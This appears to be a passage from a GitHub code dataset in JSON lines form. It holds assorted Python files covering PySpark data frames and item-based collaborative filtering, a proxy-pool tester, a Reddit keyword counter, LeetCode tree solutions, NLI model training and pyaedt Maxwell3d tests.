such combinations satisfy all the constraints?\n\t# if so, include in satisfyingPaths\n\tsatisfiedList = []\n\n\tfor element in possiblePathsList:\n\t\t# Checking all conditions\n\t\t# POSIBLEMENTE NO SEAN NECESARIOS\n\t\t# DESARROLLA getPossiblePaths PRIMERO\n\t\tif hasDuplicates(element): continue\n\t\tif len(element) != STEPS: continue\n\t\tif hasWrongFlyOvers(element): continue\n\n\t\t# Adding to list if meets all criteria\n\t\tsatisfiedList.append(element)\n\n\t#\n\n\treturn toPrint\n\n\n# Asking for user input\n\nprint(\"Please, enter your starting point and the desired number of steps.\")\nSTARTING_POINT = input(\"Starting point (A string from A to I: \")\nSTEPS = input(\"Number of desired steps (An integer): \")\nSTARTING_POINT.upper()\n\n# Printing result\n\ntoPrint = solverOrchestration(STARTING_POINT, STEPS)\n\nprint(\"These are all possible paths within given constraints:\")\nfor element in toPrint:\n\tprint(element)","repo_name":"iagovar/openbootcamp","sub_path":"99 Reto Python/2 patronesDesbloqueo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24704613656","text":"import pyspark\n\n\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType\n\n\n\nspark = SparkSession.builder.appName('Test').getOrCreate()\n\n\n\n# Defined a structure \nschema = StructType([StructField('id', StringType(), True),\n StructField('num', IntegerType(), True)\n ])\n\n\n# We create a DF with a defined schema\ndf = spark.createDataFrame([[1,2],\n [3,4]],schema)\n\ndf.printSchema()\n\n\n# Define a nested structure\n\n\ndata = [((\"James\",None,\"Smith\"),\"OH\",\"M\"),\n ((\"Anna\",\"Rose\",\"\"),\"NY\",\"F\"),\n ((\"Julia\",\"\",\"Williams\"),\"OH\",\"F\"),\n ((\"Maria\",\"Anne\",\"Jones\"),\"NY\",\"M\"),\n ((\"Jen\",\"Mary\",\"Brown\"),\"NY\",\"M\"),\n ((\"Mike\",\"Mary\",\"Williams\"),\"OH\",\"M\")\n ]\n\nschema = StructType([\n StructField('name', StructType([\n StructField('firstname', StringType(), True),\n StructField('middlename', StringType(), True),\n StructField('lastname', StringType(), True)\n ])),\n StructField('state', StringType(), True),\n StructField('gender', StringType(), True)\n ])\n\ndf2 = spark.createDataFrame(data = data, schema = schema)\ndf2.printSchema()\n\n\nspark.stop()","repo_name":"BenRamo06/PySpark","sub_path":"pipeline/Dataframe/03.-Dataframe_Structure.py","file_name":"03.-Dataframe_Structure.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40744720628","text":"#!/usr/bin/env python -tt\n# encoding: utf-8\nfrom django.conf.urls import *\n\nurlpatterns = patterns('',\n # 3rd party, modified for widelands\n (r'^wiki/', include('wiki.urls')),\n (r'^forum/', include('pybb.urls')),\n\n # WL specific:\n url(r'^$', lambda *args, **kwargs: None, name='mainpage'),\n url(r'^webchat/', include('wlwebchat.urls')),\n url(r'^maps/', include('wlmaps.urls')),\n url(r'^screenshots/', include('wlscreens.urls')),\n url(r'^wlscreens/', include('wlscreens.urls')),\n )\n","repo_name":"risooonho/widelands-website","sub_path":"wlscreens/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"73029486177","text":"import asyncio\nimport aiohttp\nfrom loguru import logger\nfrom proxypool.schemas import Proxy\nfrom proxypool.storages.redis import RedisClient\nfrom proxypool.setting import TEST_TIMEOUT, TEST_BATCH, TEST_URL, TEST_VALID_STATUS, TEST_ANONYMOUS\nfrom aiohttp import ClientProxyConnectionError, ServerDisconnectedError, ClientOSError, ClientHttpProxyError\nfrom asyncio import TimeoutError\n\n\nEXCEPTIONS = (\n ClientProxyConnectionError,\n ConnectionRefusedError,\n TimeoutError,\n ServerDisconnectedError,\n ClientOSError,\n ClientHttpProxyError,\n AssertionError\n)\n\n\nclass Tester(object):\n \"\"\"\n tester for testing proxies in queue\n \"\"\"\n \n def __init__(self):\n \"\"\"\n init redis\n \"\"\"\n self.redis = RedisClient()\n self.loop = asyncio.get_event_loop()\n \n async def test(self, proxy: Proxy):\n \"\"\"\n test single proxy\n :param proxy: Proxy object\n :return:\n \"\"\"\n async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(ssl=False)) as session:\n try:\n logger.debug(f'testing {proxy.string()}')\n # if TEST_ANONYMOUS is True, make sure that\n # the proxy has the effect of hiding the real IP\n if TEST_ANONYMOUS:\n url = 'https://httpbin.org/ip'\n async with session.get(url, timeout=TEST_TIMEOUT) as response:\n resp_json = await response.json()\n origin_ip = resp_json['origin']\n async with session.get(url, proxy=f'http://{proxy.string()}', timeout=TEST_TIMEOUT) as response:\n resp_json = await response.json()\n anonymous_ip = resp_json['origin']\n assert origin_ip != anonymous_ip\n assert proxy.host == anonymous_ip\n async with session.get(TEST_URL, proxy=f'http://{proxy.string()}', timeout=TEST_TIMEOUT,\n allow_redirects=False) as response:\n if response.status in TEST_VALID_STATUS:\n self.redis.max(proxy)\n logger.debug(f'proxy {proxy.string()} is valid, set max score')\n else:\n self.redis.decrease(proxy)\n logger.debug(f'proxy {proxy.string()} is invalid, decrease score')\n except EXCEPTIONS:\n self.redis.decrease(proxy)\n logger.debug(f'proxy {proxy.string()} is invalid, decrease score')\n \n @logger.catch\n def run(self):\n \"\"\"\n test main method\n :return:\n \"\"\"\n # event loop of aiohttp\n logger.info('stating tester...')\n count = self.redis.count()\n logger.debug(f'{count} proxies to test')\n cursor = 0\n while True:\n logger.debug(f'testing proxies use cursor {cursor}, count {TEST_BATCH}')\n cursor, proxies = self.redis.batch(cursor, count=TEST_BATCH)\n if proxies:\n tasks = [self.test(proxy) for proxy in proxies]\n self.loop.run_until_complete(asyncio.wait(tasks))\n if not cursor:\n break\n\ndef run_tester():\n host = '96.113.165.182'\n port = '3128'\n tasks = [tester.test(Proxy(host=host, port=port))]\n tester.loop.run_until_complete(asyncio.wait(tasks))\n\nif __name__ == '__main__':\n tester = Tester()\n tester.run()\n # run_tester()\n\n","repo_name":"Python3WebSpider/ProxyPool","sub_path":"proxypool/processors/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":5076,"dataset":"github-code","pt":"34"} +{"seq_id":"20508668393","text":"#!/usr/bin/python3\n\"\"\"prints hot articles by keyword from reddit api \"\"\"\nimport requests\n\n\ndef count_words(subreddit, word_list, kw_count={}, after=None, word_occ={}):\n \"\"\"list posts in hot section of a subreddit\"\"\"\n\n if after:\n hot_posts = requests.get('https://reddit.com/r/' + subreddit +\n '/hot.json?after=' + after,\n headers={\"User-Agent\": \"hot_scraping_app\",\n \"limit\": '100'})\n else:\n hot_posts = requests.get('https://reddit.com/r/' + subreddit +\n '/hot.json',\n headers={\"User-Agent\": \"hot_scraping_app\",\n \"limit\": '100'})\n\n # Status 404\n if hot_posts.status_code == 404:\n return\n\n if kw_count == {}:\n for word in word_list:\n kw_count[word] = 0\n word_occ[word] = word_list.count(word)\n\n # parse json\n hot_posts_dict = hot_posts.json()\n hot_posts_data = hot_posts_dict['data']\n after = hot_posts_data['after']\n hot_posts_posts = hot_posts_data['children']\n\n # Post data\n for post in hot_posts_posts:\n post_data = post['data']\n post_title = post_data['title']\n title_words = post_title.split()\n for w in title_words:\n for key in kw_count:\n if w.lower() == key.lower():\n kw_count[key] += 1\n\n if after:\n count_words(subreddit, word_list, kw_count, after, word_occ)\n\n else:\n for k, v in word_occ.items():\n if v > 1:\n kw_count[key] *= v\n\n sorted_titles = sorted(kw_count.items(), key=lambda x: x[0])\n sorted_res = sorted(sorted_titles, key=lambda x: (-x[1], x[0]))\n\n for res in sorted_res:\n if res[1] > 0:\n print(\"{}: {}\".format(res[0], res[1]))\n","repo_name":"stellarAlien/holbertonschool-interview","sub_path":"0x13-count_it/0-count.py","file_name":"0-count.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27937135673","text":"class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution1:\n def __init__(self):\n self.result = []\n self.path = []\n\n def traversal(self, node, count):\n \"\"\"\n Time O(n)\n Space O(n)\n 后序遍历,count是用来判断当前node是否满足总和,用减法来判断,记录所有路径,则不需要返回数值在递归过程中\n 每层处理当前node的子节点的value和path\n \"\"\"\n if node.left is None and node.right is None and count == 0:\n self.result.append(self.path[:]) # deep copy path\n return\n if node.left is None and node.right is None:\n return\n\n if node.left: # 每层处理当前node的子节点的value和path\n self.path.append(node.left.val) # 递归\n count -= node.left.val # 此处体现回溯的逻辑,减去后不满足这要加回来,等于回到上一个node\n self.traversal(node.left, count)\n count += node.left.val\n self.path.pop()\n\n if node.right: # 每层处理当前node的子节点的value和path\n self.path.append(node.right.val)\n count -= node.right.val # 此处体现回溯的逻辑,减去后不满足这要加回来,等于回到上一个node\n self.traversal(node.right, count)\n count += node.right.val\n self.path.pop()\n\n return\n\n def pathSum(self, root: TreeNode, targetSum: int) -> [[int]]:\n\n if root is None:\n return self.result\n\n self.path.append(root.val)\n self.traversal(root, targetSum - root.val)\n\n return self.result\n\n\nclass Solution2:\n def __init__(self):\n self.result = []\n self.path = []\n\n def traversal(self, node, value, target):\n \"\"\"\n Time O(n)\n Space O(n)\n 前序遍历的写法,value处理当前节点value,path处理当前下一个子节点value\n path list 无法像value一样,只处理当前层的节点,path list会随着传入下一层而改变之前层path list的value\n \"\"\"\n if node.left is None and node.right is None:\n if target - value == node.val:\n path_copy = self.path.copy()\n self.result.append(path_copy)\n return\n else:\n return\n\n value += node.val # 每层处理当前node的value和node的子节点path\n\n if node.left:\n self.path.append(node.left.val)\n self.traversal(node.left, value, target)\n self.path.pop()\n\n if node.right:\n self.path.append(node.right.val)\n self.traversal(node.right, value, target)\n self.path.pop()\n\n return\n\n def pathSum(self, root: TreeNode, targetSum: int) -> [[int]]:\n\n if root is not None:\n self.path.append(root.val)\n self.traversal(root, 0, targetSum)\n return self.result\n else:\n return self.result\n\n\nclass Solution3:\n def __init__(self):\n self.result = []\n\n def traversal(self, node, value, path, target):\n \"\"\"\n Time O(n)\n Space O(n)\n 前序遍历的写法,value处理当前节点value,path同时也处理当前节点value\n 但path list会随着传入下一层而改变之前层path list的value,所以处理递归后要回溯pop out\n \"\"\"\n value += node.val\n path.append(node.val)\n\n if node.left is None and node.right is None:\n if target == value:\n path_copy = path.copy()\n self.result.append(path_copy)\n return\n else:\n return\n\n if node.left: # 每层处理当前node的value和当前node的path\n self.traversal(node.left, value, path, target)\n path.pop() # 前序遍历在一开始就处理了添加,所以之后要回溯,回到前一个node节点\n\n if node.right:\n self.traversal(node.right, value, path, target)\n path.pop()\n\n return\n\n def pathSum(self, root: [TreeNode], targetSum: int) -> [[int]]:\n if root:\n self.traversal(root, 0, [], targetSum)\n\n return self.result\n\n\nt1 = TreeNode(val=1)\nt2 = TreeNode(val=2)\nt3 = TreeNode(val=4)\nt1.left = t2\nt1.right = t3\nsolution = Solution3()\nprint(solution.pathSum(t1, 5))\n","repo_name":"jsheng0901/leetcode","sub_path":"Binary Tree/113.py","file_name":"113.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17297798267","text":"# -*- coding: utf-8 -*-\nimport findspark\nimport gc\nfrom joblib import dump, load\nimport numpy as np \nfindspark.init()\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructField, StructType, LongType, StringType, IntegerType\nimport pyspark.sql.functions as F\nfrom pyspark import SparkContext, SparkConf\nfrom tqdm import tqdm\nfrom itertools import permutations\nfrom collections import defaultdict\nimport time\n\nspark = SparkSession.builder.appName(\"item cf on spark\").master(\"local[8]\").getOrCreate()\n\nsc = spark.sparkContext\n\nschema = StructType([StructField('userId', IntegerType(), True), \n StructField('movieId', IntegerType(), True), \n StructField('rating', LongType(), True), \n StructField('timestamp', IntegerType(), True)])\nratings = spark.read.csv(r'D:\\Users\\hao.guo\\deepctr\\recsys\\movielen\\ml-20m\\ratings_small.csv', header=True)\n\nratings = ratings.withColumn('rating', ratings['rating'].cast('int'))\nratings_rdd = ratings.select(['userId', 'movieId', 'rating']).rdd\n# ratings_rdd = ratings_rdd.sample(withReplacement=False, fraction=0.5, seed=2020)\ntrain_rdd, test_rdd = ratings_rdd.randomSplit([0.7, 0.3], seed=2020)\n# train_rdd = train_rdd.cache()\n# test_rdd = test_rdd.cache()\n\nprint('item cf start......')\ns = time.perf_counter()\n\ncreateCombiner = lambda v: [v]\nmergeValue = lambda agg, v: agg + [v]\nmergeCombiners = lambda agg1, agg2: agg1 + agg2\n\n# 代替groupbykey\ntrain_user_items = train_rdd.map(lambda s: ('user_' + s['userId'], [('item_' + s['movieId'], s['rating'])])).reduceByKey(lambda p1, p2: p1 + p2)\ntrain_item_norm_dict = train_rdd.map(lambda s: ('item_' + s['movieId'], s['rating'] ** 2)).reduceByKey(lambda p1, p2: p1 + p2).mapValues(lambda v: np.sqrt(v)).collectAsMap()\n\ntrain_item_norm_dict = sc.broadcast(train_item_norm_dict)\n\n'''\n 获得2个物品所有的user-user对得分组合:\n (item1_id,item2_id) -> [(rating1,rating2),\n (rating1,rating2),\n (rating1,rating2),\n ...]\n'''\ndef findpairs(pairs):\n res = []\n # 考虑活跃用户的影响, 冷门的物品兴趣才更加有把握相似\n m = len(pairs)\n for u1, u2 in permutations(pairs, 2):\n res.append(((u1[0], u2[0]), [(u1[1] / np.log1p(m), u2[1] / np.log1p(m))]))\n # res.append(((u1[0], u2[0]), (u1[1], u2[1])))\n return res\n\npairwise_items = train_user_items.filter(lambda p: len(p[1]) > 1).map(lambda p: p[1]).flatMap(lambda p: findpairs(p)).reduceByKey(lambda p1, p2: p1 + p2)\n\n'''\n 计算余弦相似度,找到最近的N个邻居:\n (item1,item2) -> (similarity,co_raters_count)\n'''\n\ndef cosine(product, r1_norm, r2_norm):\n fenmu = r1_norm * r2_norm\n return product / fenmu if fenmu else 0.0\n\ndef calcSim(pairs, item_norm_dict):\n ''' \n 对每个item对,根据打分计算余弦距离,并返回共同打分的user个数\n '''\n # 其他位置为0\n sum_xy, n = 0.0, 0\n\n for rating_pair in pairs[1]:\n sum_xy += rating_pair[0] * rating_pair[1]\n n += 1\n\n cos_sim = cosine(sum_xy, item_norm_dict[pairs[0][0]], item_norm_dict[pairs[0][1]])\n return pairs[0], (cos_sim, n)\n\ndef keyOnFirstItem(pairs):\n '''\n 对于每个item-item对,用第一个item做key\n '''\n (item1_id, item2_id) = pairs[0]\n return item1_id,(item2_id, pairs[1])\n\ndef nearestNeighbors(item_id, co_pairs, n):\n '''\n 选出相似度最高的N个物品\n '''\n # 归一化\n max_w = np.max([pairs[0] for i, pairs in co_pairs])\n scored_pairs = [(i, (pairs[0] / max_w if max_w != 0 else 0.0, pairs[1])) for i, pairs in co_pairs]\n scored_pairs.sort(key=lambda x: x[1][0], reverse=True)\n return item_id, scored_pairs[:n]\n\ndef item_sim(pairwise_items, train_item_norm_dict, n):\n item_sims = pairwise_items.map(lambda p: calcSim(p, train_item_norm_dict.value)).map(keyOnFirstItem).combineByKey(createCombiner, mergeValue, mergeCombiners).map(lambda p: nearestNeighbors(p[0], p[1], n))\n return item_sims\n\n\n'''\n 为每个用户计算Top N的推荐\n user_id -> [item1,item2,item3,...]\n'''\ndef topNRecommendations(user_id, items_with_rating, item_sim_w, n):\n '''\n 根据最近的N个物品进行推荐\n '''\n\n totals = defaultdict(int)\n\n user_items = [i for i, r in items_with_rating]\n\n for item, rating in items_with_rating:\n # 遍历邻居的打分\n nearest_neighbors = item_sim_w.get(item, None)\n\n if nearest_neighbors:\n for neighbor, (sim,count) in nearest_neighbors:\n if neighbor in user_items:\n continue\n # 更新推荐度和相近度\n totals[neighbor] += sim * rating\n\n # 按照推荐度降序排列\n totals = sorted(totals.items(), key=lambda p: p[1], reverse=True)\n\n # 推荐度的item\n ranked_items = [x[0] for x in totals]\n\n return user_id, ranked_items[:n]\n\ndef Precision(user_id, pui, test, n):\n hit = 0\n all = 0\n tui = test[user_id]\n for item in pui:\n if item in tui:\n hit += 1\n all += n\n return (hit, all)\n\ndef Recall(user_id, pui, test):\n hit = 0\n all = 0\n tui = test[user_id]\n for item in pui:\n if item in tui:\n hit += 1\n all += len(tui)\n return (hit, all)\n\ndef Coverage(user_id, pui, train_items, test):\n recommend_items = set()\n all_items = set()\n tui = test[user_id]\n for item, rating in train_items[user_id]:\n all_items.add(item)\n for item in pui:\n recommend_items.add(item)\n return recommend_items, all_items\n\ndef Popularity(user_id, pui, item_popularity):\n ret = 0\n n = 0\n for item in pui:\n ret += np.log1p(item_popularity[item])\n n += 1\n return ret, n\n\ndef popularity(pairs):\n popular = set()\n for user, rating in pairs[1]:\n popular.add(user)\n return pairs[0], len(popular)\n\ntrain_item_users = train_rdd.map(lambda s: ('item_' + s['movieId'], [('user_' + s['userId'], s['rating'])])).reduceByKey(lambda p1, p2: p1 + p2)\n# item流行度字典\nitem_popularity = sc.broadcast(train_item_users.map(popularity).collectAsMap())\n\nuser_item = test_rdd.map(lambda s: ('user_' + s['userId'], ['item_' + s['movieId']])).reduceByKey(lambda p1, p2: p1 + p2)\nuser_item_hist = user_item.collectAsMap()\ntest_users = list(user_item_hist.keys())\ntest_users_items = sc.broadcast(user_item_hist)\ntrain_items = sc.broadcast(train_user_items.collectAsMap())\n\ndef eval(test_users, test_users_items, item_sims_w, train_items, item_popularity, n):\n# def eval(item_sims, train_user_items, item_popularity, test, n):\n # user_item = test.map(lambda s: ('user_' + s['userId'], ['item_' + s['movieId']])).reduceByKey(lambda p1, p2: p1 + p2)\n # user_item_hist = user_item.collectAsMap()\n # test_users = list(user_item_hist.keys())\n # test_users_items = sc.broadcast(user_item_hist)\n\n # item_sims_w = sc.broadcast(item_sims.collectAsMap())\n\n '''\n 为每个用户计算Top N的推荐\n user_id -> [item1,item2,item3,...]\n '''\n # choose test recs, 有过历史浏览的用户\n user_item_recs = train_user_items.filter(lambda p: p[0] in test_users).map(\n lambda p: topNRecommendations(p[0], p[1], item_sims_w.value, n)).cache()\n \n # precision\n hit, all = user_item_recs.map(lambda p: Precision(p[0], p[1], test_users_items.value, n)).reduce(lambda x, y: (x[0] + y[0], x[1] + y[1]))\n p = hit / (all * 1.0)\n # recall\n hit, all = user_item_recs.map(lambda p: Recall(p[0], p[1], test_users_items.value)).reduce(lambda x, y: (x[0] + y[0], x[1] + y[1]))\n r = hit / (all * 1.0)\n # Coverage\n # train_items = sc.broadcast(train_user_items.collectAsMap())\n recommend_items, all_items = user_item_recs.map(lambda p: Coverage(p[0], p[1], train_items.value, test_users_items.value)).reduce(lambda x, y: (x[0].union(y[0]), x[1].union(y[1])))\n c = len(recommend_items) / (len(all_items) * 1.0)\n # popularity\n recom_popularity, all = user_item_recs.map(lambda p: Popularity(p[0], p[1], item_popularity.value)).reduce(lambda x, y: (x[0] + y[0], x[1] + y[1]))\n popularity = recom_popularity / (all * 1.0)\n # del user_item_recs, user_item_hist, test_users, test_users_items, item_popularity, item_sims_w, train_items\n del user_item_recs, test_users, test_users_items, item_popularity, item_sims_w, train_items\n gc.collect()\n return p, r, c, popularity\n\n# 生成训练集各用户的相似矩阵\nfor k in [5, 10, 20, 40, 80, 160]:\n # 物品最相近的N个物品\n item_sims = item_sim(pairwise_items, train_item_norm_dict, k)\n item_sims_w = sc.broadcast(item_sims.collectAsMap())\n print('eval model start......')\n # p, r, c, popularity = eval(item_sims_w, train_user_items, item_popularity, test_rdd, 50)\n p, r, c, popularity = eval(test_users, test_users_items, item_sims_w, train_items, item_popularity, 50)\n print('top %s model: %s, %s, %s, %s' % (k, p, r, c, popularity))\n del item_sims, item_sims_w\n gc.collect()\n\n# user_sims = user_sim(pairwise_users, train_user_norm_dict, 10)\n# p10, r10, c10, popularity10 = eval(user_sims, item_popularity, train_user_items, test_rdd, 100)\n# print('top 10 model: %s, %s, %s, %s' % (p10, r10, c10, popularity10))\n# del user_sims\n# gc.collect()\n\n# user_sims = user_sim(pairwise_users, train_user_norm_dict, 20)\n# p20, r20, c20, popularity20 = eval(user_sims, item_popularity, train_user_items, test_rdd, 100)\n# print('top 20 model: %s, %s, %s, %s' % (p20, r20, c20, popularity20))\n# del user_sims\n# gc.collect()\n\n# user_sims = user_sim(pairwise_users, train_user_norm_dict, 40)\n# p40, r40, c40, popularity40 = eval(user_sims, item_popularity, train_user_items, test_rdd, 100)\n# print('top 40 model: %s, %s, %s, %s' % (p40, r40, c40, popularity40 ))\n# del user_sims\n# gc.collect()\n\n# user_sims = user_sim(pairwise_users, train_user_norm_dict, 80)\n# p80, r80, c80, popularity80 = eval(user_sims, item_popularity, train_user_items, test_rdd, 100)\n# print('top 80 model: %s, %s, %s, %s' % (p80, r80, c80, popularity80))\n# del user_sims\n# gc.collect()\nprint('cost time %s min' % ((time.perf_counter() - s) / 60))","repo_name":"jhhugo/recom_sys","sub_path":"movielen/src/spark_icf.py","file_name":"spark_icf.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12393075584","text":"import sys\nimport numpy\n\n\n\nclass VariancePlugin:\n def input(self, filename):\n self.myfile = filename\n\n def run(self):\n filestuff = open(self.myfile, 'r')\n firstline = filestuff.readline()\n self.bacteria = firstline.split(',')\n if (self.bacteria.count('\\\"\\\"') != 0):\n self.bacteria.remove('\\\"\\\"')\n self.n = len(self.bacteria)\n self.ADJ = []\n for i in range(self.n):\n self.ADJ.append([])\n for line in filestuff:\n contents = line.split(',')\n for j in range(len(contents)-1):\n value = float(contents[j+1])\n self.ADJ[j].append(value)\n\n def output(self, filename):\n # Variance in .txt\n filestuff2 = open(filename, 'w')\n filestuff2.write(\"Element\\tVariance\\n\")\n filestuff2.write(\"\\n\")\n variances = []\n for i in range(self.n):\n sum = 0\n variance = 0\n if (len(self.ADJ[i]) != 0):\n for j in range(len(self.ADJ[i])):\n sum += self.ADJ[i][j] #* self.n # Trying Unnormalized\n average = float(sum) / len(self.ADJ[i])\n for j in range(len(self.ADJ[i])):\n variance += (average - self.ADJ[i][j])**2#*self.n) ** 2\n variances.append((variance / len(self.ADJ[i]), self.bacteria[i])) \n variances.sort()\n variances.reverse()\n for i in range(len(variances)):\n filestuff2.write(variances[i][1])\n filestuff2.write(\"\\t\")\n filestuff2.write(str(variances[i][0]))\n filestuff2.write(\"\\n\")\n\n\n","repo_name":"movingpictures83/Variance","sub_path":"VariancePlugin.py","file_name":"VariancePlugin.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39645766732","text":"import datasets\r\ndata = datasets.load_dataset('SetFit/mnli')\r\n\r\nhf_token = \"\" # huggingface token to upload to the huggingface hub\r\nfinal_name = \"\" # what to save the model name as\r\n\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\r\n\r\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification, TrainingArguments, Trainer\r\n\r\nmax_input_length = 512\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"distilbert-base-uncased\")\r\nmodel = AutoModelForSequenceClassification.from_pretrained(\"distilbert-base-uncased\", num_labels=3)\r\n\r\nspecial_tokens_dict = {'additional_special_tokens': ['<|style|>', '<|fact|>']}\r\nnum_added_toks = tokenizer.add_special_tokens(special_tokens_dict)\r\nmodel.resize_token_embeddings(len(tokenizer))\r\n\r\ndef preprocess_function(examples):\r\n inputs = [\"<|sentence1|>\" + examples['text1'][i] + \" <|sentence2|> \" + examples['text2'][i] for i in range(len(examples[\"text1\"]))]\r\n \r\n model_inputs = tokenizer(inputs, max_length=max_input_length, truncation=True)\r\n\r\n # Setup the tokenizer for targets\r\n #with tokenizer.as_target_tokenizer():\r\n # labels = tokenizer(examples[\"output\"], max_length=max_target_length, truncation=True)\r\n\r\n #model_inputs[\"labels\"] = labels[\"input_ids\"]\r\n return model_inputs\r\n\r\ntrain_tok = data['train'].map(preprocess_function, batched=True)\r\ntest_tok = data['validation'].map(preprocess_function, batched=True)\r\n\r\nfrom transformers import DataCollatorWithPadding\r\ndata_collator = DataCollatorWithPadding(tokenizer=tokenizer)\r\n\r\ntraining_args = TrainingArguments(\r\n output_dir=\"./results\",\r\n learning_rate=2e-5,\r\n per_device_train_batch_size=64,\r\n per_device_eval_batch_size=64,\r\n num_train_epochs=3,\r\n weight_decay=0.01,\r\n save_strategy='no'\r\n)\r\n\r\nfrom datasets import load_metric\r\nmetric = load_metric('accuracy')\r\n\r\ndef compute_metrics(eval_pred):\r\n predictions, labels = eval_pred\r\n predictions = np.argmax(predictions, axis=1)\r\n return metric.compute(predictions=predictions, references=labels)\r\n\r\ntrainer = Trainer(\r\n model=model,\r\n args=training_args,\r\n train_dataset=train_tok,\r\n eval_dataset=test_tok,\r\n tokenizer=tokenizer,\r\n compute_metrics=compute_metrics,\r\n data_collator=data_collator,\r\n)\r\n\r\ntrainer.train()\r\n\r\nimport numpy as np\r\ntrainer.evaluate()\r\n\r\nfrom huggingface_hub.hf_api import HfFolder\r\nHfFolder.save_token(hf_token)\r\nmodel.push_to_hub(final_name)","repo_name":"nbalepur/expository-text-generation","sub_path":"train/train_nli.py","file_name":"train_nli.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"23047398934","text":"# Setup paths for module imports\nimport os\nimport tempfile\n\nfrom _unittest.conftest import BasisTest\nfrom _unittest.conftest import desktop_version\nfrom _unittest.conftest import local_path\nfrom pyaedt import Maxwell3d\nfrom pyaedt.generic.constants import SOLUTIONS\nfrom pyaedt.generic.general_methods import generate_unique_name\n\ntry:\n import pytest\nexcept ImportError:\n import _unittest_ironpython.conf_unittest as pytest\n\ntest_project_name = \"eddy\"\n\n\nclass TestClass(BasisTest, object):\n def setup_class(self):\n BasisTest.my_setup(self)\n self.aedtapp = BasisTest.add_app(self, application=Maxwell3d, solution_type=\"EddyCurrent\")\n core_loss_file = \"PlanarTransformer.aedt\"\n example_project = os.path.join(local_path, \"example_models\", core_loss_file)\n self.file_path = self.local_scratch.copyfile(example_project)\n\n def teardown_class(self):\n BasisTest.my_teardown(self)\n\n def test_01_create_primitive(self):\n self.aedtapp.modeler.model_units = \"mm\"\n\n plate_pos = self.aedtapp.modeler.Position(0, 0, 0)\n hole_pos = self.aedtapp.modeler.Position(18, 18, 0)\n # Create plate with hole\n plate = self.aedtapp.modeler.create_box(plate_pos, [294, 294, 19], name=\"Plate\") # All positions in model units\n hole = self.aedtapp.modeler.create_box(hole_pos, [108, 108, 19], name=\"Hole\") # All positions in model units\n self.aedtapp.modeler.subtract([plate], [hole])\n plate.material_name = \"aluminum\"\n assert plate.solve_inside\n assert plate.material_name == \"aluminum\"\n\n def test_02_create_coil(self):\n center_hole = self.aedtapp.modeler.Position(119, 25, 49)\n center_coil = self.aedtapp.modeler.Position(94, 0, 49)\n coil_hole = self.aedtapp.modeler.create_box(\n center_hole, [150, 150, 100], name=\"Coil_Hole\"\n ) # All positions in model units\n coil = self.aedtapp.modeler.create_box(\n center_coil, [200, 200, 100], name=\"Coil\"\n ) # All positions in model units\n self.aedtapp.modeler.subtract([coil], [coil_hole])\n coil.material_name = \"Copper\"\n coil.solve_inside = True\n p_coil = self.aedtapp.post.volumetric_loss(\"Coil\")\n assert type(p_coil) is str\n\n def test_03_coordinate_system(self):\n assert self.aedtapp.modeler.create_coordinate_system([200, 100, 0], mode=\"view\", view=\"XY\", name=\"Coil_CS\")\n\n def test_04_coil_terminal(self):\n self.aedtapp.modeler.section([\"Coil\"], self.aedtapp.PLANE.ZX)\n self.aedtapp.modeler.separate_bodies([\"Coil_Section1\"])\n self.aedtapp.modeler.delete(\"Coil_Section1_Separate1\")\n assert self.aedtapp.assign_current([\"Coil_Section1\"], amplitude=2472)\n self.aedtapp.solution_type = \"Magnetostatic\"\n volt = self.aedtapp.assign_voltage(self.aedtapp.modeler[\"Coil_Section1\"].faces[0].id, amplitude=1)\n cur2 = self.aedtapp.assign_current([\"Coil_Section1\"], amplitude=212)\n assert cur2\n assert cur2.delete()\n assert volt\n assert volt.delete()\n self.aedtapp.solution_type = \"EddyCurrent\"\n\n def test_05_winding(self):\n face_id = self.aedtapp.modeler[\"Coil_Section1\"].faces[0].id\n assert self.aedtapp.assign_winding(face_id)\n bounds = self.aedtapp.assign_winding(current_value=20e-3, coil_terminals=face_id)\n assert bounds\n bounds = self.aedtapp.assign_winding(current_value=\"20e-3A\", coil_terminals=face_id)\n assert bounds\n bounds = self.aedtapp.assign_winding(res=\"1ohm\", coil_terminals=face_id)\n assert bounds\n bounds = self.aedtapp.assign_winding(ind=\"1H\", coil_terminals=face_id)\n assert bounds\n bounds = self.aedtapp.assign_winding(voltage=\"10V\", coil_terminals=face_id)\n assert bounds\n bounds_name = generate_unique_name(\"Winding\")\n bounds = self.aedtapp.assign_winding(coil_terminals=face_id, name=bounds_name)\n assert bounds_name == bounds.name\n\n def test_05a_assign_coil(self):\n face_id = self.aedtapp.modeler[\"Coil_Section1\"].faces[0].id\n bound = self.aedtapp.assign_coil(input_object=face_id)\n assert bound\n polarity = \"Positive\"\n bound = self.aedtapp.assign_coil(input_object=face_id, polarity=polarity)\n assert not bound.props[\"Point out of 